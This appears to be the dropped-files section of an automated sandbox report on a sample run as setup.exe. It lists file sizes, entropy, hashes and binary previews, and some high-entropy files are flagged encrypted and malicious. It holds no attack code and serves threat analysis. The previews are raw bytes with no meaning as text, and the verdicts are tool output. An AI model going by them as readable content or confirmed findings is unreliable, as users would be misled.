              SHA-256:DA2B266B9BA8479278EDFEB2619F96553453FC4E6015265A9A90241300E1AEBC
              SHA-512:B07E32F0AD025DE6E21D5ACF27C90FBF9B078BE096D5839C6FBB7C0BB120F13D26E38AD2CE88B2F3AC7C951E115FEA8F9C192CAD032AC8AE427C646867F82499
              Malicious:false
              Preview:{.".T..)hT.,/.Ob.z..f..sJ.....,.X.........gp..J,.".)`...l,l.....zE6..1...K.......*#....#...H...M.G.-....U_.m.B~.c..>.I.0"^.T.<....S.KKa......O+.6..8....S...B4&..a.]X.....a....(..j,.....Q...E..cT..8y..CC.14mz~*.e...eU..r.Y}}_UP..p8{....d..}....l..*......;l.H_..2.......&....T..Q..1.kn..Yj..`8.....5......+|vZ..?0......5.+...FPoB......K...!.$..3...y.......6....7...UVu.dm.....8 ...D[Q/...1......#[U].............%.(.v.5I.o^.Q0..f.(..y.a......n1G|..y.<.`..%.R......W..c.......Va...\.....E....<..m.w,B$|.%t..#S0..!......J....+...7..p..x.)XVy.zz..c.O..+..z........h....G..za).*HRf....7...:..K.J..Ar. .. .n...m..........m............i.X\... .s...sJ....$..*.&.lU.s..b..n..1c....v...k0.i..b..Uv.R|...!...z.<.B..(...a..'.&m...].i/K.u...g.f.=&/S..my.....|_...N.....L.0.M..4.$K U't....J.i.t..f.........+..d.L]..wG.F.r..@...D.F..).......n.Y..0f..v...^:..`....w...e0~.DPwQ...............A_4.|..k.]P...X..#.5."."V..x.,g$....DB......`.e.uY..."@...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3018
              Entropy (8bit):7.93654225517178
              Encrypted:false
              SSDEEP:48:B485aNUELsYYO7UTetmoGLSimSzEMNB3qAENXCCK/s1JgPslkRTWD:hLELFtBtmo7SzEMNlqJNSN0LgI
              MD5:F58C89BD7B62CCCAA8FF52E85B42500C
              SHA1:5F8B49481DFF44A629A42485C82DE8F1F31E783D
              SHA-256:F20C0E0D7C1936623CA7FF481A37B692BB71DB5846E0562E4BA223A4D5FD2808
              SHA-512:B4E942E5E26AC7AA81F31A715C519CF6E2237A16F32A0FAE273DB1B4FB7C61C3175E6BF8D8D5C9CB2C92DC18F9E6D5D514ADC4CA77CBC57F4AB8F7EB46DF47F4
              Malicious:false
              Preview:{.".T}..i.b...y..J.c......r)'C..5A..;#.yU[6~.XZ...!.~h.=*...........\.H..H.&.,.'X+..g..........eS<... ...9PW&.cyrj..>`@.....E.J.F......6.C...o.+....}[...&^...fZ.g...Mm.....O X..6....t......e....sQ...cC..s..8i)...1Nq.4.....b...7.G\.^.X..E..x.$ ..A..(r4J.....~.HQ.....$....;.Oe<..?.....#.....N9~d.//J.....j0...0r.c...{.5...{V.s..lj].....Z..<..:..>.L.j.fU.........^.x2\.x......Y.b..@B\..oS.l....Y.X.!.h..2.W...S.1.oHx.L-..K..Tvn...r..u,..9...&8.d9...0....#...Y:EoYv.C..91U:..a.vOE.i.\.T.*....6..G....Tm...P).J.Pz..f~...o.\F._..y?....(.sL[.g....v7...Va..r.Ec..Uk..F3..nL..|]...>.H#q..W..|..JSg".9......b.1f^...g.....s.Xs..B.S..C......*.....I..Yb..=Y.o.t..7Wz.X.=.f..wW.}.Q7.....F.Y...Y:...e .. ...F...C..D.}.#-0...By)..MI.I%+.|..l<.%.)....!.K...y.d$.......6F.o......Pt.>NwRo.Q.l....a.-......g....n..S..H&..^...A..._....>.0.6..3Q...]...H..JbsQy.....d..........XC....sS?..n.^.^..O.7.s.H.vB0...!.......D...tj::..28...;.Oi.<..1...n.6y..,.3|M.....r@.1...s......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.922267026046501
              Encrypted:false
              SSDEEP:48:+DVlklaQqdITR+O/inPnkYMvlRUXN26bCuOrIp/e04gNZlwkJLzA8D35kED:WYqdSinPWRUrvwWmkPDpR
              MD5:7488C087D9D84917D7DBA3C5F4A976B3
              SHA1:0C1D44233CCC931C4BF390B680A6A24800687E95
              SHA-256:E2C0449267C021B096CB9881F2C56988EEA0679244F7EC41D669F286025710F1
              SHA-512:FABD3F67CBE3AC0971551A8FDB05241BA0A887C5F47C9BE210A5382D2A840D2629D07106AB14C4A8E6429E710B4D40C152BE31BB01D81A742685830190BE6FA1
              Malicious:false
              Preview:{.".T..ukp;..pWI..{G]..Q....8.w.7....0..l.G8..........h4...A.!b.+..N...]|..l.rx.eB.*...\[ ...GELO}.h..,..'.......%....!..~Vc.2!Df..Ja..6 ..P....@..Y.......OZejz.A......+^..?U..2.N?..V@.....#..:...N.r.9.\......g.E.7.^l.;.].1E...K..~...P`l.*...!B...m.Yc.......R.t.82(<J..pI=y....+g...F.h...dj....Jx.-7..u..iJ$...C...i.@..<.'. ...;..v....l2[cvO6..(..e..2+.<.B.w.?.............RtSw.s...{,...G7f.{..#.J..a..n....xV+..u.Z.LF_:&u.....8.(..b{..J..0............mjP8c.U=.6.L...}N.m..R........}.$..5...(.R.2..p.Y..N.T.J....^...--@.L.j..h..Hl..=..n...u.)]..W...;Y.pd).J..L.\..*Q..:.....g......u.k.....y.0.......}..K.)...\&;..C`._.>+E].Z`..E.cI.3=.>.....6@.e.[.L..t......0.}.......U...6/nX.C.Y.!"..X`......X.B...^..f...........g...m.Yq.]-d.7......2z~....j~f.H..6.wxz.....x.0.d..Pf...*<..g.+....e..xcO.|#.3b..`...|j.'...M5s.{7.=P...,....0. ....7^...\...L(...n}.;...[..1...(....W..6..I........\7........{=..*|.@6.x..<k.G....M..r..n.k~X.X...C.h.S......s....M
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4956
              Entropy (8bit):7.961103698495552
              Encrypted:false
              SSDEEP:96:Z9US5YkiSe/Ac0asw4EAZ8Bi9KsnYVdh2EynnIXOf0WVRk2A:cSre/Acbswe37YVdCIS0WVRhA
              MD5:1EBB0A3E934003B4EEA6C21D8422AAD6
              SHA1:B87B3D5044F012013EB0E6516D23E543D585010B
              SHA-256:80B15E3DC6AF6C45EAF70C751274609F3F39139229EB36C3C48839A6355CFBBF
              SHA-512:1E626D26ECBC7F53C9EDD79D3E1EA1FFC50B641155ED0C66902B746FBB2629BD35E8216320B1B794872D8376B0C49C2E81949CB921D863462F940F8030E658E4
              Malicious:false
              Preview:{.".T...%.....u../@..*.7W/.M..>)N.3..[...H.....-.(1u..w..lvU..Fj[.9w...D.W"Q.......r...R@..5..0.>..R..|q|..J*..."....z..ctoO9.Pzt.|....Ay.p....S(..r~...&[T.......>.?......s~....0|n...S.....Lo.u.3OO)a.....)..M0.)v.-.!......WFjtvN.Q....^.....Il.;.*=...n.t....-i2.z.X....f;..d....{..BB......<..-|.H.. ...tciC....Z...~.D...m.a...'0vZ.!(xa.I...........p.4.j.^ .s..j..Sz.......b...^.3.....A.z.|.jz......Jd......._..N..E.QD.U..F+K8.2..#...y......F..g.|}).j=.2E..@..A.%M...'b..n...N...1...Z9.B...q.......TPkH.....}*......hd.I.E(.;...@!BAqr.zY[D]r....;|..f...Y.M..X../.l.~..7.l&._.].....#..9.b.[>J.u*..:dK....W\..4.x-.V..7oVpt.(k^#.}.J33............J4;1<.N....q.}..*..x......".=..#...c.D.p..>.$3./G....b5....#{.....o-7ks.!F..z .r}].4.*+...0s.p.'.d....=JIx..b..r.w...95.........$.1.gJ:..............8..=...W....f}.L..I ...L2h....g.zJK...Q..9......,.i-S..uK..!..r+.J...e..^...,...-].<].:[%.oD......n...|Ew...j.....y,..--....21A..U..L.>L.M...x......R`....n..... ..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3018
              Entropy (8bit):7.937564881446898
              Encrypted:false
              SSDEEP:48:YOeWRoIMrj42JTg7JIR9y+XgGCvkazycowauVplowjW29p1iWWW5S3f3njNQc6lb:QemJEIR9yBsazycoCN/1vSP6catN
              MD5:7E5E157C778578ED68C94992594D1B25
              SHA1:77DA0EDB15A6EC3B43FF1E189F016D85FC9BBA6A
              SHA-256:2C33017B8CE5B234B7487DD1C0134E9D5B9927449442CE12AF8C8E86AE4F593E
              SHA-512:0434DB1EA919DDCDE7D0B54D3CE1CB4194C1E2E7687CD58A3258094D8342B6685EC4F66DC5E482FEB8710CCB22D9770F28FFC3AD9F51735D7FECC806F851FBD4
              Malicious:false
              Preview:{.".T.....T.ZAx/H.H|GlY.....r.."2d...8.nUwL.....A.Q....':sMS.(.....FM..ut#hif.S.~..h..O.E.mxmj..a...Y. ..S.p.@..e.+...IQ|.m&.i/pYo'...b.ds..~.....[....#a.r..DO.}....4J<W*.u._..?_.p8.9J./..Q.14..>8.r.f..Z.+..h.....~....(5../.HR(..g..^.G}..W.P..o(..9c....i%...S0.=.E...K.,.......s.......U.. .1+&.H...<ov:@..H...bfX.E..u."bd].w..u........P.[.8XS........i.u2.._.u.H.q.>x.z0.]..`......:..S.D.{)..............dK.l.y....P.y...D_._P.`......Z....cm.......{.....I.d....."n....4jV...9f.H.....{..PZ...SB*...Z.{A#..G.....N.@%..M.r..WI].x5(...Z.t>....>../..}.)...Y'$...@&..C.3..?..?O9*..T.>+.N...pm...T3Zs.?..[....CN|.g.8.j.p.-..a...k..&..3<.P4..z}....$..j.u_@...{..Pg...>#$n..@S..=....<.oI.......MX.......}.$.b..68....F.k....Y...*..77...9[.m.JPd..e.D..>4.O9.*.;..d.Z...rR.r....yK~4...8.+........X..W....U...'S...<.Pn..)y..).L....2.rP:...i..E.."a[............. ......._........V.....!.wj.......5.......s>E...R3/$\Q....&..a..?^.q.G..zS.....M.K.K0..v.P..Kk....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2612
              Entropy (8bit):7.926991096011233
              Encrypted:false
              SSDEEP:48:gNMIijusJZ8GJ5JmKve32Hw7ISH61sdPkxS6E9sh5bO1LD:gq7jYG7J8/7IIJkxSJs3bOB
              MD5:BA232A936A52CAD35730716A49BA98C4
              SHA1:FE58575B56A31B9B025E915C426077BC9D46A366
              SHA-256:28CEE61B196C45B0BDAF808EFA1DC6CF702AD832E881D935879EAC2F07395EE1
              SHA-512:D66161D9E14281A7302EE8183227FFC4BDD63A7EF5C8A46ABA8FAB60A96CC18118E3B18CC65CFD343A5E414F246F72E9224CB517DE028F493B6B5FF23A91E035
              Malicious:false
              Preview:{.".T..p..z.p....i^.wp.....K.Z^.rs.n,.b.X;..)./.C....)F..:.. .x.B.Z..._.DzY..fL......T..yYR.....Oc...'?.. ..(N..B.s...\.4.i9+..2A)h...>..u..%.l..[.......V.A...<......S..3.?....G.45..H2zcnq..t.o.!h.pi.lOl...."....Pv..D.......H...4,...!."....,x.*.+..vNJ@....t1R.o...P...l\.gC.......?@.W.R+;4.&.57.:5f.7.p....2c.C....F..g.D.!~...!..4.....<.Y. /......'..._....8.....*...<0.q;P.HD....Y.7...I..uW.."...Iv......c.z...q........X.Y....5.....V.4.Xc*..@%&$f...{}(-....!.................9h..M.L.Zz.$2K..bO.N<...a..Z..3...G;.oo.......K.LIA.).m..*...-...v.Q.\...........pfV..V....|.2.....0p>..w&.....)2..;Wq8D{.M.W..`...s.T+.3...pP)...I.*E*..B..EA.M.H:..9......1rxx..HV9........'....l.9{.8.;..'=.p.8....,.fq.).L..B.\...`....0..s.Y...$...qI>;9.).M.F..WJ..o1..ov......[...$R0.....q&.d.k...fC...7Z<!...:m...I'........7.....{W.y.../A'...}~BC.w...$O...h.E.u1....J.32.P5.>].......~7.*..9V.m.|..^?y.Q$.W.i.Q.-..l...ii...W..T.Y....9..^.@H..]J..k=u.......;F.%--.:.M
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):770
              Entropy (8bit):7.71161649727243
              Encrypted:false
              SSDEEP:12:jCEET8NrnKqs8f2v3ZjONEvtLbjUFb52a5Dt5cpe9UzNlNLTm5TpD+5sMR2cii9a:jCE28hnK2w3Z7VUF1jDt+6UPpm1pambD
              MD5:2C9DC84AEEB1F2341BE5AA401CCC53BC
              SHA1:82F75725E6B6D96134371D54B21033149F9D20D7
              SHA-256:6C51AF37098F255C36FF1028ADADFB548844271141AC9BC1831A01AD74AA0C68
              SHA-512:B38ED3871239C8B8A712B7349BCF9F0A494155AC82078405F97EDA909CBFC7225AB08EB050C9BA6AD7874931502FC4B8FB7971BB638C30EF5ADA8DD945EC5902
              Malicious:false
              Preview:....Bxs....q+".f.'.U.;...,[R.W..<......`[.,$...E...S....7._..J*C?..G....1*.-^.f.._......u.Z..`^.OTJ..gg.......%v...yr/^.!.Ps~.Z.r.i7...........7E...U.....r....;f=....-.Ll...nNrM...(...8...}..~......q.o..B.G...1.3....*..u....p.l..*!gr[w..h...N;..-.nAA....O..!.t,..;..S6..&HZ.H.;.<....H....'|&`..*e..`S?.).U)|....k..)..)..q..lq..xB.w...~/%...e..Ib....z.2..g^..i.....[s_..R..a...s..+[.4P..nb..rA{...K.;j....m.....xb..f...Q.......1...OrI.b.B..t.h.."uP.....-.B......yje...:........p`(...bP....V....9..........G..m......E..N.r..M.;..)...;.1&...[N.B..:..7.4..aqGj.q6d,.S.qoTr.-..#.ju.s.M.....^..O.V+9.o....K...s.{.v...jf...1...0..[.d.}.D.N.Z........CtX..h..x(+.....H..LVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):424152
              Entropy (8bit):6.331956040240633
              Encrypted:false
              SSDEEP:6144:y8k1XgLqNgQFqrZPW36U3CcFnDbT9m+vyJfbnQkK96B88yKv4bWTmTvEiLSL:0VgOe1PzICODbBm+6dF4/Q
              MD5:AFBB888EDCD0E834519450372384B20A
              SHA1:46260256D9E155F728058039C30DA98B7A3F8D76
              SHA-256:050FD7F1BDCE66C268DB505C8D9948363A1604A2DC367FF2867A916DDFBA4E24
              SHA-512:F35ADD08B58EE2AB1CB81D8727E1C9C82FADBB91A7545A9D56E642CE23D0EE42BDA3FE02BDF789877A4D7F0BDCEBB6C6AAF590AC67BC36466EBA5144CFFA40CB
              Malicious:false
              Preview:...P..v...S>M.)t.)..."8.....*x[.|.W 6.2.....>N..l5.(...9Eu.3.]lx..6W....\.d..B.....=.F....{B.p3V.c..d......5...G!.`.....:.#.,.GD......_.$..e.}..#^...FI....z>...z.. a4'....h....+.....9..N.Wn.)..8k..o.|..@u....br.tH......j..i..).q@#....w..&,8:....~._..8wG..s-.v=..y'B.TC.`....d.J..Y:l........W..._.#.O}K/..j.c.QJ..M....~.)=..z.........U.+0....B.g\.].z..W.v.Q..%.8....u$..fq.......w.n........S.q..#.....,h..VN.k.2.....@^b...Bv....s.5..L..M..F..{......$#...L......w..S...Z.;....J.b.&.e...=..-}...E..[..28.Q....XV&.?r.&....TQY.W..[:....N.\.b.I....Y.g*.....w....F..#FN=N......b/.....f...Z..a..B..Y.fw..[M....S.XE-...V.P......O..'.BE5.^...W.+...*......c.Nh....)$..X.....R.`..<I....)..,v....YH..5.lQ!.....T.^.~>.s. .Y"..:....zl..|..#..U$.....[G5.i.....}.v..Y.r..*....E../H....t...|..L.....X....`........C ...,G.....>Nu.X.6d.\...l....f.X..@........i.L!.-iG.4f..\x>...>ZC.i-1.V.V..9...VY?.8.............4'b..go..;DlhX.pB...!^p..Q.N.o.........*..E......+.Q
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.989963273384275
              Encrypted:false
              SSDEEP:384:7HqpMxUWFc0T3BqfYj30jrUrzczpckhwTjFsCLM:uUUW+0GnzZ0FTLM
              MD5:46A2CA219867E6829366581504284E0A
              SHA1:10B6791647641C873F885648C100DDC76D095655
              SHA-256:A243C93B9E36637EDE6E640B02A2F9956ED1BB578484F662D16B46B4E7E7D2A9
              SHA-512:C9DBAB2CEA19C71071D483FF55EEE98E14F649B283AFCCA7021320A2251E4728A0414C69E110B8623213156FD1E4DC20BCDAA4846C17AE5EEB66CC0CA88D22AE
              Malicious:false
              Preview:.... G*...@...#P..'..9......Rx.U..........UE5%....G.?..`.).n....z.u#.../..>...I.1.|`....7:.1.c...qjy7......#".1.V......Z.<.Y@..;...3... .JI)...w.V....<....IqSU.9...S..}D..."...o..F.+.O.~%....g...;.d.G.]O.f.;...}.9.....X...A....N....H\iN...9v`Q.Bj..W'W=..9..6;.&.`...}3....YB;Qv..lI....2..I#..aR8=;2.P.*H...P.......f.....s..^...rN.A{.2....0@-2.H...~......o.z8.....SW.$.m..sZ..+...5.2fw .y.r.k...=.6BJ`8g._.j.n..j0Y.7......n`...J..(.A.E.8W{_.y........}...W#P.K.S;..!.m.@b...d.u.2S.o."(.'o..wW......p...-{.c.}..;G=.s{.Y.....FH...H..5^k.E.......6.&.t....S*@.d..;<..m.....&........|........S.6 0....W.dliW......^.....V..tW$..l".@h..>>Ga_...9t..c]....%@.C..<.0...:/.:........s..t.(..JUN.'..K?..t.Q}p.7m.t._.v....L...y..h...Y&^...i&.!.!F...e1e.y&.:...E.m..fW..o..z..rD...L......O.B....{..<.*....K>_9..r..y.T.-..."...l..^J.HY....%...c.-3.~+.N.........n.u...TrT............n.....[.6>.J.z..#k..Ri...]..*N....X..c\......T*K.k...@.E..Pn..DU..6.(q.e.p...Rs..c
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.988966147968357
              Encrypted:false
              SSDEEP:384:nI16aUKYQby4kRUSWOAnJLrJEwqgRRAyuZQyIL49Q+aebULx0iYE6x:njqYQbyiOAnJLrJvAy+zzocn
              MD5:D331A314F6E668B5FDB85CE1567088BB
              SHA1:1B34CAD303B4E7A3966357A1BB4BD9BD77FA48D0
              SHA-256:03E10CA2CE7AD226F669D2D1A4AB401A7A57B21510A958788DF95CDC58E9F8E4
              SHA-512:A6E6E309BB97AF03750D5A605A2C3F908191F94F714D0B2BED56A051B30055E317639EC13D5E92941FE315B34842324542D113DA518E90BBE6EDB0DA7147FB20
              Malicious:false
              Preview:....`.'.W.....4.NV...=...L...3..i.LvBw..C<a...2.Xq]..N.Z..i.A.cz7..G.u.gS...b.M.g.'..g......pyX.K-u...S1..2...\.R..cp..u?om.}....>.w.....E.h=5Q....F..XM.O.j...../.._?..>...c....g...t.....y>..d..^WG.*.<..&f*.evh.2h..o..!.F......!..{.m."..n k=.|.q......[..<K....H...X.i.c6...u[Mo.x.v..g..Piu.......4..Ko...A.L<.u.rC...%.r...F(9M....#.Q.....Ui[...f......D:.Vc,.....E.C.OfV)is..... ..U....#.Qh.W........{0.1..Wn.y3[..... [...-Q....3....!.V>Z..r.....Bz..n{#W.&d..-\.3.W.....?.K......RV.m.S...p...._'s.hq..hkjkEW.W......@.`.W.&........u%.....rs..C..}.....N....;7.?f./.Cj.z/p..va.%.<..T+Q ..Y;Xw'}*.4..dc.[.3....L..X...Z0q....Ld.$....X_.A.......^.)`..pM..3r.6...g....>...!.(.T.....?..M.^.}....d..|-...!A.j...hM...@0.P.......F0nH^8.}."'...q.5M6P0..[..K.ov.).o.....7-.......&...pN..1>P.51vX."C.....^M.x.:.$h..}+...7.n.!....2.sDe.......?e.....Mb.72...v,T`...-+rt.e(..0.].].{.Q-.~..J...e..).MsB.1C....K.t..P..A...z.Z()OV.zu....p[.T.X.}..b...+p.....,.G...',..?..?
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):424190
              Entropy (8bit):6.330549438081045
              Encrypted:false
              SSDEEP:6144:wk5j3r6ekMCc0m5Go87BCJsm+vyJfbnQkK96B88yKv4bWTmTvEiLSC:Nj3rNkMVOo+BCJsm+6dF4/V
              MD5:94EE1CBA97B87AB7F2E27A4E4C5169C8
              SHA1:844E7D09D695B15CD098FFF4F7A147B3C195F577
              SHA-256:E463A83EF7BCFE3F87579FB69E89DCFE117D6CAFA009AEBB921F4BFF3B47EB22
              SHA-512:5BD550C3AED415BEE015CDE957BC97656BA7F10772E8857E4351E2096A76811633207B22358F825D9885D06352C041625E892F39669B38DA5049616F17144F3D
              Malicious:false
              Preview:.w.. ..=.J2.C..x...%|.....<..=....d.-aM=..~.a-...a.. 5N.5).0....x.m.;S..=q.r1^h\...AG.$1...H)...#..f..&]....d..N d.8..xG.....A.<#.n.g.$.....+Ic.D...p......4.t.6t8....-7....C..!..p....+.......o*M.P..A...3....{.WU..Py.:.Q+_/C.@LL:...U..~..&.A(..oO....$.Fx.!A...7. /...(..-N....o.$.0.....i..^..8;.xxBr.(]... ..sm..g.'.._.++.3."O.d.c.nW.=.,5.u.xv...4t......../2..yo...O...=d.$..c..a...%..O59s*G....lP.4.$H.R......./..|.N..}..]S........*E...k...;C.G......V..v.&....."......_;z....b....].u...aD........._./-..D........E..'../9..Xnc.=..).f...............|.i...0@..wZ..g.......I..A.....=....?JLS*)...-....f......=.....CC...9p...u.._U..T.0.]....).G.D..`..J.hr...<.xa..Y+3..D....:.}..(.3....:...0?..7.m.7..o..t..hY%....sicx..z.ZUCI..x9...N.B.(.lX&)/{T.1v...Z.Sa..i....W..p.J.)..'.#q..M..k......KmK.zJ....=6.II..q.."..1.-..&..h....'.......#.c..'.`).-.....>.Hr......O.sJ.....e.j%I..<..R..".@...G.@R.,`a_:..d\.4...W.%[..2..`_..........v.`...&5.OS..k.]...I.DO
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):104126
              Entropy (8bit):7.998024021171423
              Encrypted:true
              SSDEEP:3072:seU3oKIiWFeH2dzemE5RNM7o7Mk+KMWVa1PXoTuK:I2iWMH0zYNMtk+KMIa9Mp
              MD5:66CCFA213D585DCFFDB35EA9A6535B01
              SHA1:F4BAFC0D7A2A5E47D5CC7B3D067C270A08B5670C
              SHA-256:54D1E351B2035825176B06632AE59321077F581222EDAF03394D02AB0FDC2163
              SHA-512:83153943E5D58462EEA7D7AD56E2CCB661453B1AEA9AC557BB86AF29DAC8F42ADA1796C70A3AF17349B3787635CDE6C6BC4AE4DF9BA3A3D1B49CEB528B9410AC
              Malicious:true
              Preview:....h.....r.&.G.Q.U.f..p..~...(..a...'...|.)...CXj@.t>..P..a...r.==e+.KR.....~..G+./`..T:.+...q...V.7AI.]............\\N7..#:..e..3.....*..,..r.....H....`..h.M..~@i....1..,.n..dx^.r.-.]..w)^..k.h...".....$j.........@.sL.y............TVRw:......7....M.m.....NcF.y..._.../!.C.Uw.._.u.x......".CY../e...ukc......,.......Ty..\rY..N...@.4+.E'..{..&.c.....jXK..p}.MP.#^Y...H.R.mF....p...t....S..@.Hj..V.. q..j.P...S.4!K...q.X.cv..u.N.A..%..7..\....N....7.U;.Os.'.;..(.;...J.~=+.._. O.S=@..>m{..%J.9.C};ei...=&JJ.(m......B.hj...1..O.2%;B.......b8=...:Z./..T....a.B.).......5Y......u..-.zhU...#.D.....~ ..T0.[....=...g...J^. .........x.u...P_..v...........L-...d.....l.=..jJc. &..*..,2....v.a*.[B..g@....f.->.n.'...C...T.W-g.^.Z..~N..l/{. .m.qa.@...C...N....k.b"...i.p+..z......#...Q.. !J?...Q2...C.H.-A.v.......e......C...Ng8#...G...m....7.LaA...;..N......X.`.w..{i..).F.#..X...?.4.B....>.k...]a.,....`...L...S.se..:mR..3JqW.R...7J../n.c...6?...]O.<.,..l#.PJ
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):102878
              Entropy (8bit):7.998289155088923
              Encrypted:true
              SSDEEP:3072:ssEjdpXUERvE/xUYqdi5xwEYHlSPVqjP9s:sVj/fG/beECSNGs
              MD5:2068945EAA236225B11E14B82F350007
              SHA1:C4C8BC246F8D1F125C7F554F166CECF40390F385
              SHA-256:BE0F57CE53123090AFD6F0A3B95911EC6319D5D67DD75C7E9E8F5A2491A08CEF
              SHA-512:C7744FEF1A9055FD9E7BEB5B3E815684DA34A95AD8DDAB0168D13824BEABE401E4BC07DE011337BC533150FC1DE36E9BD7347F6F73E507D04997599D0E1565EF
              Malicious:true
              Preview:....hW..,../......n..|.&...H....6.1J.[6h..I.NL9.9...s.p..@.h.36......}..w....~'.f*G....N.E..[.3c..Uwc.T..|Jh&......%.I....P...+}..m..$ur..W7-..7..?}wsXx...+.......D.2..m...5c.....OC....uV....J..W-.f.}w.e.mB..W.^..M.G7....5.._C.WIk~]......EC.c.......V.......7g.7....1.....-.Xn....\.K.*......{-..A6E..4^....tH.K.;...l.....-..S.........N..s.q6..U...$..[...x...2..T21BhcS..K5......... .^..C.B.........5|...hy...s;.]B....d.9.x.Z........]n..W.....f....F6..".fg....T..b<2......5.ukn..-;.rM..+...~....yu...W)I0..}fd9PS......@H...RU...k..E.........,..w..[...L..NM*)..v..Y.h..~..4.Y..N.....,.Y..K...........$=........;...O..j.<...N.M...d.:w.G.Zb>u..8...<n.....&*...b.pS..ug.9.?.i..O..^G?.......i....z8.H....?.....O.h..R>...n{..tK..}f.&....@ .*|...8....E.1..A-.],X.m=...=6........%C.&....%.n..S..7.............v........N{..!.t.g...V.NI.,7.:.1?...E.....z...>tA4I...I.X..X..X5I.2.....j..:y.%. .H.w.%..J...d..Yr....(z.#.....Q.&....&..].... .d........7....5|.....0a.d.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):99742
              Entropy (8bit):7.998273565737434
              Encrypted:true
              SSDEEP:3072:1kLXT73Z95ohH7DFEuIXi+0c2Xh8qdmxqhLG:q33qhbDFnR3cDemQLG
              MD5:0281F4A7F1E0415E6866FCD6946B056D
              SHA1:114971F74279CA7F032B2C23F6E012D269066CA8
              SHA-256:914089176054C83A2D48368E1E2B5762796AF1E9D08BB2605CE91C9128F6BC14
              SHA-512:FC5B692575815F72484E8DB58DA04C63AECD62486C1E71D0CD3C6BC2C35DF89403FF78FE62EE1ED948EB7669E53AC22D72DE4205DE60A00F27D52DBB6476398C
              Malicious:true
              Preview:.....M....J..R.........I+rrZ|..).:.-.3...|&..H.".,5....-.~5q.a..m.j..8.G..f.5y........q...1.N.Z..~(.V...kU.o.$....L...t.....F~#.P\.d.O3.|.......p.e.do........-h.e...B,3g....D&m.....(.......3.ZJ.......u.=?....%N...z.`..1..1%.H..T.H.t.......)..<.J.(.]%....k....L.`.f.S...]....(E..F.mu.+...O._..b=U]jvg....Y..M.....h.E.*Iy._.j.. }6.C...9].!...a..@..E.P....2...\.....`.,..=....L;..5.).]....vb...."`Ea.R....<..g.j.y.t.-.......3..V}.Q...R/............d.....r.r..%.b........./+.+.,...x.67.|$O..Q.Q.........t.....^...Jd..!..(.........+.....6v...8.:..{...N`SG3.Q..d.....Y.J5...?...2...x........d....H.8.B.]..k.....mSv.Q....?.........'..._&.i..}.|j...<....r%.e...[..v.Js..?nV....)......9...|....v..5....[.. NW....xh.n..fY..L.c ...h.eb...7.4.....5).q..a....../..M...\...F...d.....;..[!D-..=.,.^<..iFU....z..>N.....U.)...f\.G..L.%.....t...2d.YD"...kq.....R.....-.k.`e.T..[,.K.=J.K.M[.......0.H+f_..>...k...H2{...".Pg....K..YC8.$V.....f*.. ...Te..]...Fj..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):100894
              Entropy (8bit):7.998215574559158
              Encrypted:true
              SSDEEP:3072:TaRyHLoaHQB1JSeGoZIPQIqCGixrSJjh+uEtGqXfmCp:bHABe0IPE1DRqPL
              MD5:84FCCC897AA8CCD1FDC40D13DDC80947
              SHA1:A4065DC055971DB29B338D4717567E4C6D67CB94
              SHA-256:273D955A65792E3A4D5F409FF1CB40D1C3D8EE0D9B9C2347AF450F8D4E1F0AB9
              SHA-512:9532AFB89C4979B39F16965C779DA18BB3119F014BFD3205F720BE1A4F3CC8EC9A7394C0A9A2DA30A9AA8F673EF9C766FD589A8242B1B1C153006632EAEFCF3F
              Malicious:true
              Preview:......z...??Z.....{B.`V.....a...fi..@..Y.mM....}.....-/BX...D.j,Q)9.T........y.9.IgV....:...+;d..C.C.@O...y......|.w.M....o..Hz(._.L.j...;..."=...3.F...!-.T.O2.,.P.P.f.6.G.z.......7UiP._.J.3~..7...P....*. ...^....T.qi.......0j4.IP...@.z....8E......s......G.O'.X....F?{..E.3...8.c...|&t..1......R.H..4 ..&=..T!...E...e....A..=i.'...h!..<.+_.8..-V...[....DX.[...=#.t...!|rB@....^.".w..$.i1...o. Ta.c..K.4.\.Z.VVZ...P...+7.$.........6.c..O.U..e6....2..\.gI?P..H.<.h.....'{i._1.....N{I.....n....b.u.s.v.7o..L.y.E...:...c^..5.Mn..$N....>.p{..Cm?.A......'R]...)gt.o...}.....a..E..S.1:.K..$.1<......s.V|)...6.......2c)..+.l.K.8..\...;:..Gi..Hd....9...A.......&..r./f.HEeqi...~...d.A.v.X..z.`...Vz,.6.8...........L...F....c.$!.w.f~`.|.........I...c.{.."..[.......K.<..).]W. G.F..E.........8O..S.{....f..z.....=`.3.d.!........(..L....i2...T...A.w........O)<DS...{....*$..B..vR...L...$a..\.....il....Cnm...hJ ..-.@.-..6.,..c./.2.Ix6.5..Cy.)..X...]..x.!{gO.?N.T.i
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):606542
              Entropy (8bit):5.704691566938261
              Encrypted:false
              SSDEEP:6144:8ouhe5OeKUQVyM/ro5a596RyxNRt24Wfde8QZOYpxaGrOAH:8Vhe5OeMjEa59n24WfdedZrO6
              MD5:BBD67CAA0FB1159518921EF4A7D5A73D
              SHA1:01A75CBEE3743A5835C58F45C4967DD13CB8E18F
